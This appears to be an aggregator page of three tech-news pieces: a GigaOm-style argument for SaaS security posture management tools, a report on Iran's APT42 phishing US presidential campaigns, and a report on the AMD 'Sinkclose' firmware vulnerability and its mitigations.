Novel technique allows malicious apps to escape iOS and Android guardrails Read More »

saas-security-posture—it’s-not-you,-it’s-me!

SaaS Security Posture—It’s not you, it’s me!

In business, it’s not uncommon to take a software-as-a-service (SaaS)-first approach. It makes sense—there’s no need to deal with the infrastructure, management, patching, and hardening. You just turn on the SaaS app and let it do its thing.

But there are some downsides to that approach.

The Problem with SaaS

While SaaS has many benefits, it also introduces a host of new challenges, many of which don’t get the coverage they warrant. At the top of the list of challenges is security. So, while there are some very real benefits of SaaS, it’s also important to recognize the security risk that comes with it. When we talk about SaaS security, we’re not usually talking about the security of the underlying platform, but rather how we use it.

Remember, it’s not you, it’s me!

The Shared Responsibility Model

In the terms and conditions of most SaaS platforms is the “shared responsibility model.” What it usually says is that the SaaS vendor is responsible for providing a platform that is robust, resilient, and reliable—but they don’t take responsibility for how you use and configure it. And it is in these configuration changes that the security challenge lives.

SaaS platforms often come with multiple configuration options, such as ways to share data, ways to invite external users, how users can access the platform, what parts of the platform they can use, and so on. And every configuration change, every nerd knob turned, is the potential to take the platform away from its optimum security configuration or introduce an unexpected capability. While some applications, like Microsoft 365, offer guidance on security settings, this is not true for all of them. Even if they do, how easy is that to manage when you get to 10, 20, or even 100 SaaS apps?

Too Many Apps

Do you know how many SaaS apps you have? It’s not the SaaS apps you know about that are the issue, it’s the ones you don’t. Because SaaS is so accessible, it can easily evade management. There are apps that people use but an organization may not be aware of—like the app the sales team signed up for, that thing that marketing uses, and of course, everyone wants a GenAI app to play with. But these aren’t the only ones; there are also the apps that are part of the SaaS platforms you sign up for. Yes, even the ones you know about can contain additional apps you don’t know about. This is how an average enterprise gets to more than 100 SaaS applications. How do you manage each of those? How do you ensure you know they exist and they are configured in a way that meets good security practices and protects your information? Therein lies the challenge.

Introducing SSPM

SSPM can be the answer. It is designed to initially integrate with your managed SaaS applications to provide visibility into how they are configured, where configurations present risks, and how to address them. It will continually monitor them for new threats and configuration changes that introduce risk. It will also discover unmanaged SaaS applications that are in use, evaluate their posture and present risk profiles of both the application and the SaaS vendor itself. It centralizes the management and security of a SaaS infrastructure and where its management and configuration present risk.

Overlap with CASB and DLP

There is some overlap in the market, particularly with cloud access security broker (CASB) and data loss prevention (DLP) tools. But these tools are a bit like capturing the thief as he runs down the driveway, rather than making sure the doors and windows were secured in the first place.

SSPM is yet another security tool to manage and pay for. But is it a tool we need? Well, that is up to you; however, our use of SaaS, for all the benefits it brings, has brought a new complexity and a new set of risks. We have so many more apps than we have ever had, many of them we don’t manage centrally, and they have many configuration knobs to turn. Without oversight of them all, we do run security risks.

Next Steps

SaaS security posture management (SSPM) is another entry into the growing catalog of security posture management tools. They are often easy to try out, and many offer free assessments that can give you an idea of the scale of the challenge you face. SaaS security is tricky and often does not get the coverage it deserves, so getting an idea of where you stand could be helpful.

Before you find yourself on the wrong end of a security incident and your SaaS vendor tells you it’s you, not me, it may be worth seeing what an SSPM tool can do for you. To learn more, take a look at GigaOm’s SSPM Key Criteria and Radar reports. These reports provide a comprehensive overview of the market, outline the criteria you’ll want to consider in a purchase decision, and evaluate how a number of vendors perform against those decision criteria.

If you’re not yet a GigaOm subscriber, sign up here.

SaaS Security Posture—It’s not you, it’s me! Read More »

google’s-threat-team-confirms-iran-targeting-trump,-biden,-and-harris-campaigns

Google’s threat team confirms Iran targeting Trump, Biden, and Harris campaigns

It is only August —

Another Big Tech firm seems to confirm Trump adviser Roger Stone was hacked.

Roger Stone, former adviser to Donald Trump's presidential campaign, center, during the Republican National Convention (RNC) in Milwaukee on July 17, 2024.

Enlarge / Roger Stone, former adviser to Donald Trump’s presidential campaign, center, during the Republican National Convention (RNC) in Milwaukee on July 17, 2024.

Getty Images

Google’s Threat Analysis Group confirmed Wednesday that they observed a threat actor backed by the Iranian government targeting Google accounts associated with US presidential campaigns, in addition to stepped-up attacks on Israeli targets.

APT42, associated with Iran’s Islamic Revolutionary Guard Corps, “consistently targets high-profile users in Israel and the US,” the Threat Analysis Group (TAG) writes. The Iranian group uses hosted malware, phishing pages, malicious redirects, and other tactics to gain access to Google, Dropbox, OneDrive, and other cloud-based accounts. Google’s TAG writes that it reset accounts, sent warnings to users, and blacklisted domains associated with APT42’s phishing attempts.

Among APT42’s tools were Google Sites pages that appeared to be a petition from legitimate Jewish activists, calling on Israel to mediate its ongoing conflict with Hamas. The page was fashioned from image files, not HTML, and an ngrok redirect sent users to phishing pages when they moved to sign the petition.

A petition purporting to be from The Jewish Agency for Israel, seeking support for mediation measures—but signatures quietly redirect to phishing sites, according to Google.

A petition purporting to be from The Jewish Agency for Israel, seeking support for mediation measures—but signatures quietly redirect to phishing sites, according to Google.

Google

In the US, Google’s TAG notes that, as with the 2020 elections, APT42 is actively targeting the personal emails of “roughly a dozen individuals affiliated with President Biden and former President Trump.” TAG confirms that APT42 “successfully gained access to the personal Gmail account of a high-profile political consultant,” which may be longtime Republican operative Roger Stone, as reported by The Guardian, CNN, and The Washington Post, among others. Microsoft separately noted last week that a “former senior advisor” to the Trump campaign had his Microsoft account compromised, which Stone also confirmed.

“Today, TAG continues to observe unsuccessful attempts from APT42 to compromise the personal accounts of individuals affiliated with President Biden, Vice President Harris and former President Trump, including current and former government officials and individuals associated with the campaigns,” Google’s TAG writes.

PDFs and phishing kits target both sides

Google’s post details the ways in which APT42 targets operatives in both parties. The broad strategy is to get the target off their email and into channels like Signal, Telegram, or WhatsApp, or possibly a personal email address that may not have two-factor authentication and threat monitoring set up. By establishing trust through sending legitimate PDFs, or luring them to video meetings, APT42 can then push links that use phishing kits with “a seamless flow” to harvest credentials from Google, Hotmail, and Yahoo.

After gaining a foothold, APT42 will often work to preserve its access by generating application-specific passwords inside the account, which typically bypass multifactor tools. Google notes that its Advanced Protection Program, intended for individuals at high risk of attack, disables such measures.

Publications, including Politico, The Washington Post, and The New York Times, have reported being offered documents from the Trump campaign, potentially stemming from Iran’s phishing efforts, in an echo of Russia’s 2016 targeting of Hillary Clinton’s campaign. None of them have moved to publish stories related to the documents.

John Hultquist, with Google-owned cybersecurity firm Mandiant, told Wired’s Andy Greenberg that what looks initially like spying or political interference by Iran can easily escalate to sabotage and that both parties are equal targets. He also said that current thinking about threat vectors may need to expand.

“It’s not just a Russia problem anymore. It’s broader than that,” Hultquist said. “There are multiple teams in play. And we have to keep an eye out for all of them.”

Google’s threat team confirms Iran targeting Trump, Biden, and Harris campaigns Read More »

almost-unfixable-“sinkclose”-bug-affects-hundreds-of-millions-of-amd-chips

Almost unfixable “Sinkclose” bug affects hundreds of millions of AMD chips

Deep insecurity —

Worse-case scenario: “You basically have to throw your computer away.”

Security flaws in your computer’s firmware, the deep-seated code that loads first when you turn the machine on and controls even how its operating system boots up, have long been a target for hackers looking for a stealthy foothold. But only rarely does that kind of vulnerability appear not in the firmware of any particular computer maker, but in the chips found across hundreds of millions of PCs and servers. Now security researchers have found one such flaw that has persisted in AMD processors for decades, and that would allow malware to burrow deep enough into a computer’s memory that, in many cases, it may be easier to discard a machine than to disinfect it.

At the Defcon hacker conference, Enrique Nissim and Krzysztof Okupski, researchers from the security firm IOActive, plan to present a vulnerability in AMD chips they’re calling Sinkclose. The flaw would allow hackers to run their own code in one of the most privileged modes of an AMD processor, known as System Management Mode, designed to be reserved only for a specific, protected portion of its firmware. IOActive’s researchers warn that it affects virtually all AMD chips dating back to 2006, or possibly even earlier.

Nissim and Okupski note that exploiting the bug would require hackers to already have obtained relatively deep access to an AMD-based PC or server, but that the Sinkclose flaw would then allow them to plant their malicious code far deeper still. In fact, for any machine with one of the vulnerable AMD chips, the IOActive researchers warn that an attacker could infect the computer with malware known as a “bootkit” that evades antivirus tools and is potentially invisible to the operating system, while offering a hacker full access to tamper with the machine and surveil its activity. For systems with certain faulty configurations in how a computer maker implemented AMD’s security feature known as Platform Secure Boot—which the researchers warn encompasses the large majority of the systems they tested—a malware infection installed via Sinkclose could be harder yet to detect or remediate, they say, surviving even a reinstallation of the operating system.

“Imagine nation-state hackers or whoever wants to persist on your system. Even if you wipe your drive clean, it’s still going to be there,” says Okupski. “It’s going to be nearly undetectable and nearly unpatchable.” Only opening a computer’s case, physically connecting directly to a certain portion of its memory chips with a hardware-based programming tool known as SPI Flash programmer and meticulously scouring the memory would allow the malware to be removed, Okupski says.

Nissim sums up that worst-case scenario in more practical terms: “You basically have to throw your computer away.”

In a statement shared with WIRED, AMD acknowledged IOActive’s findings, thanked the researchers for their work, and noted that it has “released mitigation options for its AMD EPYC datacenter products and AMD Ryzen PC products, with mitigations for AMD embedded products coming soon.” (The term “embedded,” in this case, refers to AMD chips found in systems such as industrial devices and cars.) For its EPYC processors designed for use in data-center servers, specifically, the company noted that it released patches earlier this year. AMD declined to answer questions in advance about how it intends to fix the Sinkclose vulnerability, or for exactly which devices and when, but it pointed to a full list of affected products that can be found on its website’s security bulletin page.

Almost unfixable “Sinkclose” bug affects hundreds of millions of AMD chips Read More »